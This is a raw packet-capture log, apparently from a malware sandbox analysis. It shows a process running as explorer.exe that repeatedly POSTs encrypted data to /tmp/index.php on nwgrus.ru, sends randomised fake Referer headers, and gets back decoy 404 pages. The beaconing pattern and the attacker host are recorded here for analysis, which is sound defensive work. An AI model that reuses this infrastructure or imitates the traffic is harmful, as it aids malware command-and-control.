Oct 8, 2024 18:23:26.761815071 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ajlkwtshfrbwcj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299
Host: nwgrus.ru
Oct 8, 2024 18:23:26.761830091 CEST | 299 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 24 fb be
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuI$jLwYM7]0Ae]U&0Y9t@FK8Nm5,6mDXGG5KL*^Pv1@g0.RwAD+
Oct 8, 2024 18:23:27.749219894 CEST | 152 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 04 00 00 00 72 e8 87 ec
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49842 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:27.790044069 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lmqmhcivixmahfcs.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 350
Host: nwgrus.ru
Oct 8, 2024 18:23:27.790143013 CEST | 350 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 34 f8 83
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vue4s@a:.?owEvR>V3?Rv_OOY\&#5vOo:wL[>o5%V'&UyDYczyKC#
Oct 8, 2024 18:23:28.876461029 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49843 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:28.886717081 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eqlgmwxqcstymthl.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 364
Host: nwgrus.ru
Oct 8, 2024 18:23:28.886749983 CEST | 364 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 31 0d ee e6
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu1j]wkdNn4 :8zaa?T1mM?JEB'\CFN'W6xNh9)DSGP(Ws@:
Oct 8, 2024 18:23:29.763870001 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 61260 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:30.614135027 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uajyyjejyvvbvl.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 110
Host: nwgrus.ru
Oct 8, 2024 18:23:30.614164114 CEST | 110 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 31 22 e0 92
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu1"lv~kpc
Oct 8, 2024 18:23:31.471081972 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 61270 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:31.481729031 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fcbqaeiodmerjjce.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 250
Host: nwgrus.ru
Oct 8, 2024 18:23:31.481729031 CEST | 250 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7c 00 fd a8
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu|LRdyTPS>rf#jLTgDLCb_UGou2XID(,Smc;@D}uG&yCfh!
Oct 8, 2024 18:23:32.360177994 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.661279160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:32.370985031 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://uqyhewsqgme.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 129
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:32.371001005 CEST129OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 50 1a be e8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuPt SYze^yS=wl@
Oct 8, 2024 18:23:33.234069109 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:33 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 61297 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:35.327059984 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://mcnivsvqoyuiyi.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 197
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:35.327059984 CEST197OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4c 02 a7 af
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuLI%wE{Jv#f`Ad"|KZ@_U>Q2>D%0,+wA*s,l-3Xvl
Oct 8, 2024 18:23:36.223494053 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 61302 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:36.233551979 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://snlvxdcuggcgtr.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 166
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:36.233597994 CEST166OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3a 44 bd e1
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu:DZXEFf'm~4hfh,?AVdWTD>780Z/1"d2`
Oct 8, 2024 18:23:37.095662117 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 61308 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:37.103588104 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://rcayuliatuydngjp.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 234
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:37.103601933 CEST234OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 7b 58 c5 ae
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu{XX_Q[P4`DWhyrsPR:`Y5`/0,R]:a)goRW%3rzzDIsY#y|Eg!V0
Oct 8, 2024 18:23:38.048799992 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:37 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 61315 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:38.059118032 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://gxhoywsjvhdimib.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 253
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:38.059129953 CEST253OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 38 45 c7 eb
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu8E@c+YBqbfMKkSo82HBHVjY,0{i'''V:/@S3A|yAOYR@kG10(+
Oct 8, 2024 18:23:38.938122034 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:38 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 61321 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:38.954802990 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://hnkujwopesopy.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 158
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:38.954817057 CEST158OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 23 3f e7 a8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu#?adQbrFx8wh@C^R*G(dlC?F_P7X
Oct 8, 2024 18:23:40.657196999 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 8, 2024 18:23:40.658646107 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
